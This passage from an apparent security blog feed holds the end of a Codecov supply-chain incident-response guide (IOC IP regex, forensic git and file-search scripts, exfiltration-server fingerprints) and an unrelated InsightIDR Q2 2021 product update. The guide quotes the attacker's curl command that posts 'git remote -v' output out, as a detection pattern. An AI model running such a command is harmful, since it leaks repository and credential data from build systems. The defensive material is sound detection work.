2. Search for known IOC IP addresses in regex form (based on RegExr community pattern)

(.*79\.135\.72\.34|178\.62\.86\.114|104\.248\.94\.23|185\.211\.156\.78|91\.194\.227\.*|5\.189\.73\.*|218\.92\.0\.247|122\.228\.19\.79|106\.107\.253\.89|185\.71\.67\.56|45\.146\.164\.164|118\.24\.150\.193|37\.203\.243\.207|185\.27\.192\.99\.*)

3. Search for known IOC command line pattern(s)

curl -sm 0.5 -d "$(git remote -v)

4. Create forensic image of affected system(s) identified in steps 1 – 3

5. Network quarantine and/or power off affected system(s)

6. Replace affected system(s) with last known good backup, image snapshot, or clean rebuild

7. Analyze forensic image and historical CI system process, job output, and/or network traffic data to identify potentially exposed sensitive data, such as credentials

Search for malicious usage of potentially exposed credentials

  1. Search authentication and activity audit logs for IP address IOCs
  2. Search authentication and activity audit logs for potentially compromised account events originating from IP addresses outside of the organization’s known IP addresses — this could potentially uncover new IP address IOCs

Unauthorized access response steps: source code repositories

Clone full historical source code repository content

Note: This content is based on git-based version control systems

Version control systems such as git coincidentally provide forensics-grade information by virtue of them tracking all changes over time. In order to be able to fully search all data from a given repository, certain git commands must be run in sequence.

  1. Set git config to get full commit history for all references (branches, tags), including pull requests, and clone repositories that need to be analyzed (*nix shell script)

git config --global remote.origin.fetch '+refs/pull/*:refs/remotes/origin/pull/*'
# Space-delimited list of repos to clone
declare -a repos=("repo1" "repo2" "repo3")
git_url="https://myGitServer.biz/myGitOrg"
# Loop through each repo and clone it locally
for r in "${repos[@]}"; do
  echo "Cloning $git_url/$r"
  git clone "$git_url/$r"
done

2. In the same directory where repositories were cloned from the step above, export full git commit history in text format for each repository. List git committers at top of each file in case they need to be contacted to gather context (*nix shell script)

git fetch --all
for dir in */ ; do
  (
    dir="${dir%/}"
    rm -f "$dir.commits.txt"
    cd "$dir"
    git fetch --all
    echo "******COMMITTERS FOR THIS REPO********" >> "../$dir.commits.txt"
    git shortlog -s -n >> "../$dir.commits.txt"
    echo "**************************************" >> "../$dir.commits.txt"
    git log --all --decorate --oneline --graph -p >> "../$dir.commits.txt"
  )
done

  a. If performing manual reviews of these commit history text files, create copies of those files and use the regex below to find and replace git’s log graph formatting that prepends each line of text. (These steps can be done with tools such as Atom, Visual Studio Code, and Sublime Text, along with extensions/plugins you can install in them.)

^(\|\s*)*(\+|-|\\|/\||\*\|*)*\s*

b. Then, sort the text in ascending or descending order and de-duplicate/unique-ify it. This will make it easier to manually parse.

Search for binary files and content in repositories

Exporting commit history to text files does not export data from any binary files (e.g. ZIP files, XLSX files, etc.). In order to thoroughly analyze source code repository content, binary files need to be identified and reviewed.

  1. Find binary files in folder containing all cloned git repositories based on file extension (*nix shell script)

find -E . -regex '.*\.(jpg|png|pdf|doc|docx|xls|xlsx|zip|7z|swf|atom|mp4|mkv|exe|ppt|pptx|vsd|rar|tiff|tar|rmd|md)'

2. Find binary files in folder containing all cloned git repositories based on MIME type (*nix shell script)

find . -type f -print0 | xargs -0 file --mime-type | grep -e image/jpg -e image/png -e application/pdf -e application/msword -e application/vnd.openxmlformats-officedocument.wordprocessingml.document -e application/vnd.ms-excel -e application/vnd.openxmlformats-officedocument.spreadsheetml.sheet -e application/zip -e application/x-7z-compressed -e application/x-shockwave-flash -e video/mp4 -e application/vnd.ms-powerpoint -e application/vnd.openxmlformats-officedocument.presentationml.presentation -e application/vnd.visio -e application/vnd.rar -e image/tiff -e application/x-tar

3. Find encoded binary content in commit history text files and other text-based files

grep -ir "url(data:" | cut -d\) -f1
grep -ir "base64" | cut -d\" -f1

Search for plaintext credentials: passwords, API keys, tokens, certificate private keys, etc.

  1. Search commit history text files for known credential patterns using tools such as TruffleHog and GitLeaks
  2. Search binary file contents identified in Search for binary files and content in repositories for credentials

Search logs for malicious access to discovered credentials

  1. Follow steps from Data exfiltration response (Searching for malicious usage of potentially exposed credentials) using logs from systems associated with credentials discovered in Search for plaintext credentials

New findings about attacker behavior from Project Sonar

We are fortunate to have a tremendous amount of data at our fingertips thanks to Project Sonar, which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities. We analyzed data from Project Sonar to see if we could gain any additional context about the IP address IOCs associated with Codecov’s Bash Uploader script compromise. What we found was interesting, to say the least:

  • The threat actor set up the first exfiltration server (178.62.86[.]114) on or about February 1, 2021
  • Historical DNS records for remotly[.]ru and seasonver[.]ru have pointed, and continue to point, to this server
  • The threat actor configured a simple HTTP redirect on the exfiltration server to about.codecov.io to avoid detection
    { "http_code": 301, "http_body": "", "server": "nginx", "alt-svc": "clear", "location": "http://about.codecov.io/", "via": "1.1 google" }
  • The redirect was removed from the exfiltration server on or before February 22, 2021, presumably by the server owner having detected these changes
  • The threat actor set up new infrastructure (104.248.94[.]23) that more closely mirrored Codecov’s GCP setup as their new exfiltration server on or about March 7, 2021
    { "http_code": 301, "http_body": "", "server": "envoy", "alt-svc": "clear", "location": "http://about.codecov.io/", "via": "1.1 google" }
  • The new exfiltration server was last seen on April 1, 2021
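The fingerprint above is simple enough to match programmatically against scan records. A minimal sketch (the field names mirror the HTTP records quoted above; the exact matching criteria are our assumption about what distinguishes this infrastructure):

```python
# The exfiltration servers answered with a bare 301 redirect to about.codecov.io
IOC_LOCATION = "http://about.codecov.io/"

def matches_ioc(response):
    """response: dict of HTTP fields as recorded in an internet-wide survey."""
    return (
        response.get("http_code") == 301
        and response.get("http_body", "") == ""
        and response.get("location", "").rstrip("/") == IOC_LOCATION.rstrip("/")
    )

suspect = {"http_code": 301, "http_body": "", "server": "nginx",
           "alt-svc": "clear", "location": "http://about.codecov.io/", "via": "1.1 google"}
print(matches_ioc(suspect))  # prints True
```

A fingerprint this generic will also match legitimate redirects, so treat hits as leads to correlate with DNS history and hosting data, not as confirmation on their own.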

We hope the content in this blog will help defenders prevent, detect, and respond to these types of supply chain attacks going forward.

What’s New in InsightIDR: Q2 2021 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/07/08/whats-new-in-insightidr-q2-2021-in-review/

This year, we’re focusing on providing customers with more extensibility and customization in InsightIDR — from adding new event sources to completely refreshing our Dashboard and Reporting experience, we’ve made some strides over the last few months.

This post offers a closer look at some of the recent updates and releases in InsightIDR, our SaaS SIEM, from Q2 2021.

Rapid7 Named a Leader in the Gartner Magic Quadrant for SIEM for the Second Year in a Row

We are thrilled to announce that Rapid7 has been named a Leader in the 2021 Gartner Magic Quadrant for SIEM. As the detection and response market becomes more competitive, we are honored to be recognized as one of the six 2021 Magic Quadrant Leaders named in this report.

We credit this achievement to our deep partnership with customers and our uncompromising commitment to delivering a solution that is intuitive and easy to execute for our users. You can read the full report for free here.

New and Improved Dashboards and Reporting Experience

We’re so excited to announce the release of our updated Dashboards and Reporting experience in InsightIDR! We’ve made some big improvements to our Card Library and Card Builder (including the addition of new visualizations), as well as a more customizable Reporting experience.

Card Library and Builder updates:

  • Users can now set different time ranges or use different log sets across multiple queries
  • Cards can be created from log sets, so you won’t need to manually update your dashboards if new logs get added
  • New Stacked Area, Word Cloud, and Packed Bubble visualizations give you more flexibility to create the views that best capture the dynamics of your network

Reporting updates:

  • Users can now set multiple reporting schedules, as well as email reports to any address for easier sharing

InsightIDR’s intuitive new Dashboard interface, featuring the new Word Cloud visualization.

Rapid7 and Velociraptor Join Forces

In April, Rapid7 acquired Velociraptor, an open-source technology and community used for endpoint monitoring, digital forensics, and incident response. We are committed to helping the Velociraptor community grow and thrive, and also plan to embed the Velociraptor Project into the Rapid7 Insight Platform, allowing our customers to benefit from this amazing technology and community.

Open source projects like Velociraptor enable the greater security community to move the industry forward. We have a track record of investing in, contributing to, and building on open source projects, dating as far back as 12 years ago with Metasploit, and in more recent years with Recog and AttackerKB. Supporting and learning from these open-source projects helps Rapid7 innovate, strengthen our product and service offerings, and bring greater value to our customers.

See more on our Velociraptor acquisition and what it means for Rapid7 customers in our blog post here.

Multi-Theme Support in InsightIDR

We’re excited to announce the release of the new dark theme in InsightIDR! This new theme will increase contrast and legibility, as well as reduce eye strain for users engaging with the screen for longer periods of time. It also provides more accessible options to those with color vision deficiency, enabling all users to have an optimal experience with our UI.

You can easily toggle between light and dark themes based on your needs for the task at hand by updating your Visual Preference within Profile Settings.

Switch between light and dark themes in InsightIDR in Profile Settings.

SCADAfence + InsightIDR for Broader OT Coverage

Joint customers of InsightIDR and SCADAfence can now configure SCADAfence to create and forward alerts to InsightIDR via syslog to generate third-party alerts.

For InsightIDR customers leveraging Enhanced Network Traffic Analysis, this integration will provide a broader picture of device activity. If a SCADAfence alert fires, Network Sensor data can show customers not only that the device is on their network, but also which network applications it’s associated with and which connections are coming to and from it.

For information on configuration, see our help documentation here.

Custom Parsing Tool Introduces the New RegEx Editor

The new RegEx Editor provides increased flexibility for customers to extract fields and custom-parse their logs by writing their own regular expressions. Customers can open the RegEx Editor from the start, or begin in guided mode and switch over at any time.
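Field extraction with a custom regular expression typically relies on named capture groups, where each group name becomes a field. A minimal illustration of the idea (the pattern and log line below are hypothetical examples, not InsightIDR's syntax):

```python
import re

# Named capture groups turn raw log text into structured fields
pattern = re.compile(
    r"(?P<timestamp>\S+) (?P<user>\S+) action=(?P<action>\w+) result=(?P<result>\w+)"
)

line = "2021-07-08T12:00:00Z jdoe action=login result=success"
m = pattern.match(line)
print(m.groupdict())
# {'timestamp': '2021-07-08T12:00:00Z', 'user': 'jdoe', 'action': 'login', 'result': 'success'}
```

Once fields are extracted this way, they become queryable in searches and dashboards rather than buried in free text.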

See details and step-by-step instructions on how to leverage the new RegEx Editor in our updated documentation here.

Extracting fields with the new RegEx Editor in InsightIDR.

Improvements for Better Visibility into the Health of Your Network Sensors

  • View the number of deployed network sensors in your environment and related errors from the Data Collection Health page.
  • Identify Network Sensor errors more easily within InsightIDR. Network Sensor errors are now rolled into the Data Collection Issues KPI on the InsightIDR Home page overview and in the Data Collection Health menu item in the top menu bar.

For more information on managing your Network Sensor, read our documentation.

Easily view Network Sensor health from the InsightIDR homepage via Data Collection Health.

Insight Agent Updates

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) Team recently released a detection that identifies if Insight Agents are not properly sending data back to the InsightIDR Platform. For more information, see our help documentation here.

Stay Tuned for More!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.